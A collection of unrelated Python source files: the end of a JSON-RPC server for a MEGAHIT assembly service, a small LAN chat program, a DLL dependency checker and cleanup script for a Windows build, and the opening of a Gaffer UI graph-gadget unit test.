return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'MEGAHIT'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_MEGAHIT.run_megahit,
name='MEGAHIT.run_megahit',
types=[dict])
self.method_authentication['MEGAHIT.run_megahit'] = 'required' # noqa
self.rpc_service.add(impl_MEGAHIT.status,
name='MEGAHIT.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'MEGAHIT ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
chat.py | import socket
import os
from _thread import *
import threading
import time
import sys
#CONFIGS
PORT=5000
messages = {}
HOST=''
USERNAME=''
def clear():
os.system('clear')
#GETS USERNAME
def get_username():
clear()
global USERNAME
print("Welcome to Python Chat!\n\n")
USERNAME = input("To continue, please type your username..\n")
return USERNAME
#LEARNS USER'S IP AND CALLS LISTEN THREAD
def get_ip(USERNAME):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
global HOST
s.connect(('10.255.255.255', 1))
HOST = s.getsockname()[0]
except:
HOST = '127.0.0.1'
finally:
clear()
print("Your USERNAME : %s\n" % (USERNAME))
print("Your IP : %s\n" % (HOST))
s.close()
Listener_Thread()
#STARTS THREAD FOR LISTENING PACKETS
def Listener_Thread():
listener_UDP_thread = threading.Thread(target=listener_UDP)
listener_UDP_thread.setDaemon(True)
listener_UDP_thread.start()
listener_thread = threading.Thread(target=listener)
listener_thread.setDaemon(True)
listener_thread.start()
enter_command()
def enter_command():
input("\nPress Enter to continue...")
main_menu()
#SENDS ANNOUNCE PACKETS VIA OPENING A UDP SOCKET AND BROADCASTING ANNOUNCEMENT.
def Announce():
global PORT
global USERNAME
global HOST
server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
server.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
server.settimeout(0.2)
server.bind(("", 5000))
packet="["+USERNAME+ ", " + HOST +", announce]"
while True:
server.sendto(packet.encode('ascii', 'replace'), ('<broadcast>', 5566))
time.sleep(10)
#SHOWS MESSAGES AND POSSIBLES TO SEND MESSAGE
def show_messages():
global messages
clear()
for k, v in messages.items():
if v != None :
print(str(k.split(',')[0]) + ": " + str(v))
tmp2=input("Please write your message..\nType 0 to Main Menu\n")
if tmp2=='0':
main_menu()
packet="["+USERNAME+ ", " + HOST +", message, "+ tmp2 +"]"
target_ip = ""
for k, v in messages.items():
key = str(k.split(',')[0])
if key != USERNAME :
target_ip = str(k.split(',')[1]).strip()
start_new_thread(send_packet, (target_ip, PORT, packet))
message_log(USERNAME, HOST, tmp2)
show_messages()
#POSSIBLES TO NAVIGATE IN MAIN MENU
def Navigator():
tmp=input("Please type your selection..")
if tmp == '1':
clear()
print("You are sending announce messages..")
Announce_thread = threading.Thread(target=Announce)
Announce_thread.setDaemon(True)
Announce_thread.start()
enter_command()
elif tmp == '2':
show_messages()
else:
clear()
print("See you again!!")
sys.exit(0)
#MAIN MENU FUNCTION
def main_menu():
clear()
print("You are in the main menu!")
print("You are automatically responding announce messages!\n")
print("If you want to send announce messages, please type 1")
print("You can access your messages by typing 2\n")
print("You can exit by typing 0")
Navigator()
#MAIN FUNCTION
def main():
USERNAME = get_username()
get_ip(USERNAME)
#TAKES HOST, PORTS AND PACKET INFO AND BY OPENING PORT SENDS MESSAGES
def send_packet(host, port, packet):
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(1)
s.connect((host, port))
s.send(packet.encode('ascii', 'replace'))
s.close()
except:
pass
#FORMS MESSAGE LOGS
def message_log(name,ip,message=None):
global messages
if not bool(message):
if ('%s, %s' %(name,ip)) not in messages:
messages['%s, %s' %(name,ip)] = None
else :
if ('%s, %s' %(name,ip)) not in messages:
messages['%s, %s' %(name,ip)] = [message]
elif not bool(messages['%s, %s' %(name,ip)]) :
messages['%s, %s' %(name,ip)] = [message]
else:
messages['%s, %s' %(name,ip)].append("%s" %(message))
#PARSER FOR INCOMING PACKETS AND STARTS NEW THREAD FOR RESPONSE MESSAGES
def parser(data):
if len(data) > 5 :
packet=[]
data=data.strip()
data=data[1:-1]
data=data.decode('ascii','replace')
target_name, target_ip, target_type, *etc = data.split(',',4)
if target_type.strip() == 'announce' :
packet="["+USERNAME+ ", " + HOST +", response]"
message_log(target_name.strip(), target_ip.strip())
start_new_thread(send_packet, (target_ip.strip(), PORT, packet))
elif target_type.strip() == 'message' :
message_log(target_name.strip(), target_ip.strip(), str(*etc).strip())
else :
message_log(target_name.strip(), target_ip.strip())
def listener_UDP():
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
client.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
client.bind(("", 5566))
while True:
data, addr = client.recvfrom(2048)
parser(data)
#OPEN LISTEN SOCKET AND SENDS PACKETS TO THE PARSER
def listener():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST,PORT))
s.listen()
while True:
conn, addr = s.accept()
data = conn.recv(2048)
if not data:
break
parser(data)
conn.send(data)
main()
|
depcheck.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2016,2017 Christoph Reiter
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""Deletes unneeded DLLs and checks DLL dependencies.
Execute with the build python, will figure out the rest.
"""
import os
import subprocess
import sys
from multiprocessing import Process, Queue
import gi
from gi.repository import GIRepository
gi.require_version("GIRepository", "2.0")
def _get_shared_libraries(q, namespace, version):
repo = GIRepository.Repository()
repo.require(namespace, version, 0)
lib = repo.get_shared_library(namespace)
q.put(lib)
def get_shared_libraries(namespace, version):
# we have to start a new process because multiple versions can't be loaded
# in the same process
q = Queue()
p = Process(target=_get_shared_libraries, args=(q, namespace, version))
p.start()
result = q.get()
p.join()
return result
def get_required_by_typelibs():
deps = set()
repo = GIRepository.Repository()
for tl in os.listdir(repo.get_search_path()[0]):
namespace, version = os.path.splitext(tl)[0].split("-", 1)
lib = get_shared_libraries(namespace, version)
libs = lib.lower().split(",") if lib else []
for lib in libs:
deps.add((namespace, version, lib))
return deps
def get_dependencies(filename):
deps = []
try:
data = subprocess.check_output(
["objdump", "-p", filename], stderr=subprocess.STDOUT
)
except subprocess.CalledProcessError:
# can happen with wrong arch binaries
return []
data = data.decode("utf-8")
for line in data.splitlines():
line = line.strip()
if line.startswith("DLL Name:"):
deps.append(line.split(":", 1)[-1].strip().lower())
return deps
def find_lib(root, name):
system_search_path = os.path.join("C:", os.sep, "Windows", "System32")
if get_lib_path(root, name):
return True
elif os.path.exists(os.path.join(system_search_path, name)):
return True
elif name in ["gdiplus.dll"]:
return True
elif name.startswith("msvcr"):
return True
return False
def get_lib_path(root, name):
search_path = os.path.join(root, "bin")
if os.path.exists(os.path.join(search_path, name)):
return os.path.join(search_path, name)
def get_things_to_delete(root):
extensions = [".exe", ".pyd", ".dll"]
all_libs = set()
needed = set()
for base, dirs, files in os.walk(root):
for f in files:
lib = f.lower()
path = os.path.join(base, f)
ext_lower = os.path.splitext(f)[-1].lower()
if ext_lower in extensions:
if ext_lower == ".exe":
# we use .exe as dependency root
needed.add(lib)
all_libs.add(f.lower())
for lib in get_dependencies(path):
all_libs.add(lib)
needed.add(lib)
if not find_lib(root, lib):
print("MISSING:", path, lib)
for namespace, version, lib in get_required_by_typelibs():
all_libs.add(lib)
needed.add(lib)
if not find_lib(root, lib):
print("MISSING:", namespace, version, lib)
to_delete = []
for not_depended_on in all_libs - needed:
path = get_lib_path(root, not_depended_on)
if path:
to_delete.append(path)
return to_delete
def main(argv):
libs = get_things_to_delete(sys.prefix)
if "--delete" in argv[1:]:
while libs:
for lib in libs:
print("DELETE:", lib)
os.unlink(lib)
libs = get_things_to_delete(sys.prefix)
if __name__ == "__main__":
main(sys.argv)
|
GraphGadgetTest.py | ##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import imath
import IECore
import Gaffer
import GafferUI
import GafferTest
import GafferUITest
class NestedPlugTestNode( Gaffer.Node ) :
def __init__( self ) :
Gaffer.Node.__init__( self )
IECore.registerRunTimeTyped( NestedPlugTestNode )
Gaffer.Metadata.registerValue( NestedPlugTestNode, "c", "nodule:type", "GafferUI::CompoundNodule" )
class GraphGadgetTest( GafferUITest.TestCase ) :
def testRemovedNodesDontHaveGadgets( self ) :
s = Gaffer.ScriptNode()
g = GafferUI.GraphGadget( s )
n = GafferTest.AddNode()
s["add1"] = n
self.failUnless( g.nodeGadget( n ) is not None )
s.deleteNodes( filter = Gaffer.StandardSet( [ n ] ) )
self.failUnless( g.nodeGadget( n ) is None )
def testRemovedNodesDontHaveConnections( self ) :
s = Gaffer.ScriptNode()
n = GafferTest.AddNode()
s["add1"] = n
s["add2"] = GafferTest.AddNode()
s["add1"]["op1"].setInput( s["add2"]["sum"] )
g = GafferUI.GraphGadget( s )
s.deleteNodes( filter = Gaffer.StandardSet( [ s["add1"] ] ) )
self.failIf( g.connectionGadget( n["op1"] ) )
def testCreateWithFilter( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
nodeFilter = Gaffer.StandardSet( [ script["add2"] ] )
g = GafferUI.GraphGadget( script, nodeFilter )
self.failIf( g.nodeGadget( script["add1"] ) )
self.failUnless( g.nodeGadget( script["add2"] ) )
def testEditFilter( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
nodeFilter = Gaffer.StandardSet( script.children() )
g = GafferUI.GraphGadget( script, nodeFilter )
self.failUnless( g.nodeGadget( script["add1"] ) )
self.failUnless( g.nodeGadget( script["add2"] ) )
nodeFilter.remove( script["add1"] )
self.failIf( g.nodeGadget( script["add1"] ) )
self.failUnless( g.nodeGadget( script["add2"] ) )
nodeFilter.remove( script["add2"] )
self.failIf( g.nodeGadget( script["add1"] ) )
self.failIf( g.nodeGadget( script["add2"] ) )
nodeFilter.add( script["add1"] )
self.failUnless( g.nodeGadget( script["add1"] ) )
self.failIf( g.nodeGadget( script["add2"] ) )
nodeFilter.add( script["add2"] )
self.failUnless( g.nodeGadget( script["add1"] ) )
self.failUnless( g.nodeGadget( script["add2"] ) )
def testUnhidingConnectedDstNodes( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
script["add2"]["op1"].setInput( script["add1"]["sum"] )
nodeFilter = Gaffer.StandardSet( [ script["add1"] ] )
g = GafferUI.GraphGadget( script, nodeFilter )
self.failUnless( g.nodeGadget( script["add1"] ) )
self.failIf( g.nodeGadget( script["add2"] ) )
self.failIf( g.connectionGadget( script["add2"]["op1"] ) )
nodeFilter.add( script["add2"] )
self.failUnless( g.nodeGadget( script["add1"] ) )
self.failUnless( g.nodeGadget( script["add2"] ) )
self.failUnless( g.connectionGadget( script["add2"]["op1"] ) )
def testCreatingWithHiddenSrcNodes( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
script["add2"]["op1"].setInput( script["add1"]["sum"] )
nodeFilter = Gaffer.StandardSet( [ script["add2"] ] )
g = GafferUI.GraphGadget( script, nodeFilter )
self.failIf( g.nodeGadget( script["add1"] ) )
self.failUnless( g.nodeGadget( script["add2"] ) )
c = g.connectionGadget( script["add2"]["op1"] )
self.failUnless( c )
self.failUnless( c.dstNodule().plug().isSame( script["add2"]["op1"] ) )
self.assertEqual( c.srcNodule(), None )
def testHidingConnectedDstNodes( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
script["add2"]["op1"].setInput( script["add1"]["sum"] )
nodeFilter = Gaffer.StandardSet( script.children() )
g = GafferUI.GraphGadget( script, nodeFilter )
self.failUnless( g.nodeGadget( script["add1"] ) )
self.failUnless( g.nodeGadget( script["add2"] ) )
self.failUnless( g.connectionGadget( script["add2"]["op1"] ) )
nodeFilter.remove( script["add2"] )
self.failUnless( g.nodeGadget( script["add1"] ) )
self.failIf( g.nodeGadget( script["add2"] ) )
self.failIf( g.connectionGadget( script["add2"]["op1"] ) )
def testHidingConnectedSrcNodes( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
script["add2"]["op1"].setInput( script["add1"]["sum"] )
nodeFilter = Gaffer.StandardSet( [ script["add1"], script["add2"] ] )
g = GafferUI.GraphGadget( script, nodeFilter )
self.failUnless( g.nodeGadget( script["add1"] ) )
self.failUnless( g.nodeGadget( script["add2"] ) )
c = g.connectionGadget( script["add2"]["op1"] )
self.failUnless( c )
self.failUnless( c.srcNodule().plug().isSame( script["add1"]["sum"] ) )
self.failUnless( c.dstNodule().plug().isSame( script["add2"]["op1"] ) )
nodeFilter.remove( script["add1"] )
self.failIf( g.nodeGadget( script["add1"] ) )
c = g.connectionGadget( script["add2"]["op1"] )
self.failUnless( c )
self.failUnless( c.srcNodule() is None )
self.failUnless( c.dstNodule().plug().isSame( script["add2"]["op1"] ) )
def testConnectingInvisibleDstNodes( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
nodeFilter = Gaffer.StandardSet( [ script["add1"] ] )
g = GafferUI.GraphGadget( script, nodeFilter )
self.failUnless( g.nodeGadget( script["add1"] ) )
self.failIf( g.nodeGadget( script["add2"] ) )
script["add2"]["op1"].setInput( script["add1"]["sum"] )
self.failUnless( g.nodeGadget( script["add1"] ) )
self.failIf( g.nodeGadget( script["add2"] ) )
self.failIf( g.connectionGadget( script["add2"]["op1"] ) )
def testConnectingHiddenDstNodes( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
nodeFilter = Gaffer.StandardSet( script.children() )
g = GafferUI.GraphGadget( script, nodeFilter )
self.failUnless( g.nodeGadget( script["add1"] ) )
self.failUnless( g.nodeGadget( script["add2"] ) )
nodeFilter.remove( script["add2"] )
self.failUnless( g.nodeGadget( script["add1"] ) )
self.failIf( g.nodeGadget( script["add2"] ) )
script["add2"]["op1"].setInput( script["add1"]["sum"] )
self.failUnless( g.nodeGadget( script["add1"] ) )
self.failIf( g.nodeGadget( script["add2"] ) )
self.failIf( g.connectionGadget( script["add2"]["op1"] ) )
def testConnectingHiddenSrcNodes( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
nodeFilter = Gaffer.StandardSet( [ script["add2"] ] )
g = GafferUI.GraphGadget( script, nodeFilter )
self.failIf( g.nodeGadget( script["add1"] ) )
self.failUnless( g.nodeGadget( script["add2"] ) )
script["add2"]["op1"].setInput( script["add1"]["sum"] )
self.failIf( g.nodeGadget( script["add1"] ) )
self.failUnless( g.nodeGadget( script["add2"] ) )
c = g.connectionGadget( script["add2"]["op1"] )
self.failUnless( c )
self.failUnless( c.srcNodule() is None )
def testConnectingHiddenSrcNodesAndReshowing( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
nodeFilter = Gaffer.StandardSet( [ script["add2"] ] )
g = GafferUI.GraphGadget( script, nodeFilter )
self.failIf( g.nodeGadget( script["add1"] ) )
self.failUnless( g.nodeGadget( script["add2"] ) )
script["add2"]["op1"].setInput( script["add1"]["sum"] )
self.failIf( g.nodeGadget( script["add1"] ) )
self.failUnless( g.nodeGadget( script["add2"] ) )
c = g.connectionGadget( script["add2"]["op1"] )
self.failUnless( c )
self.failUnless( c.srcNodule() is None )
nodeFilter.add( script["add1"] )
self.failUnless( g.nodeGadget( script["add1"] ) )
self.failUnless( g.nodeGadget( script["add2"] ) )
c = g.connectionGadget( script["add2"]["op1"] )
self.failUnless( c )
self.failUnless( c.srcNodule().plug().isSame( script["add1"]["sum"] ) )
def testChangingFilter( self ) :
script = Gaffer.ScriptNode()
